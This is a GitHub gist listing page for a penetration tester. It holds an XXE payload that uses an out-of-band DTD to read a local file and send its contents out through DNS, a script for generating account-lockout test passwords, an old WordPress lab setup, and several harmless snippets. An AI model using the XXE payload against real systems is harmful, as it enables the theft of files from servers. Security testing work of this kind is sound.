Marc Wickenden marcwickenden

@marcwickenden
marcwickenden / XXE.xml
Created May 16, 2018
XXE payload to exploit dns exfil
View XXE.xml
<?xml version="1.0" ?>
<!DOCTYPE x [
<!ENTITY % oobfile SYSTEM "https://gist.githubusercontent.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2/raw/98f3a015c12aa2d3288376281040ec003961c6dc/oob-dns.xml">
%oobfile;
%url;
%exfil;
]>
<x></x>
marcwickenden / oob-dns.xml
Created May 16, 2018
Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
View oob-dns.xml
<!ENTITY % data SYSTEM "file:///tmp/foo">
<!ENTITY % url "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.127.0.0.1.xip.io/capture'>">
marcwickenden / generate-intruder-passwords.sh
Created Aug 3, 2017
Generate payloads for testing account lockout with Intruder
View generate-intruder-passwords.sh
#!/bin/bash
# Usage: ./generate-intruder-passwords ThisisthecorrectPassword123 20
#
# The first argument is the correct password for the app.
# The second argument is the maximum number of password attempts to make.
# 20 is the default, if it hasn't locked you by then I'd say that's a finding.
# 
# The script will simply increment up to $LIMIT outputting n incorrect passwords and then the correct one.
# We enter the correct one to potentially reset the incorrect count.
View docker-compose.yml
version: '2'
services:
  wordpress:
    image: wordpress:4.7.1
    ports:
      - 8080:80
    environment:
      WORDPRESS_DB_PASSWORD: example
View keybase.md

Keybase proof

I hereby claim:

  • I am marcwickenden on github.
  • I am marcwickenden (https://keybase.io/marcwickenden) on keybase.
  • I have a public key ASD0R4SdJk8CnPiG_t4Y1LGCIbFQXlEM19O45DsoU4fMSwo

To claim this, I am signing this object:

marcwickenden / 100sec.rb
Created Nov 21, 2013
Automatically follow the @Marble_Security top-100-security-experts list members. If that's useful to you! You'll need to supply valid OAuth credentials from dev.twitter.com (read-write). You also need the twitter gem installed: gem install twitter. Then just: ruby 100sec.rb
View 100sec.rb
#!/usr/bin/env ruby
require 'twitter'
Twitter.configure do |config|
  config.consumer_key = "<your consumer key>"
  config.consumer_secret = "<your consumer secret>"
  config.oauth_token = "<your oauth token>"
  config.oauth_token_secret = "<your oauth token secret>"
end
marcwickenden / gist:7218936
Created Oct 29, 2013
Googlebot user agents
View gist:7218936
$ ruby apache_user_agent.rb
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
View gist:4046089
diff -ruw exim-4.80/doc/ChangeLog exim-4.80.1/doc/ChangeLog
--- exim-4.80/doc/ChangeLog 2012-05-31 01:40:15.000000000 +0100
+++ exim-4.80.1/doc/ChangeLog 2012-10-25 04:37:38.000000000 +0100
@@ -1,6 +1,14 @@
Change log file for Exim from version 4.21
-------------------------------------------
+Exim version 4.80.1
+-------------------
+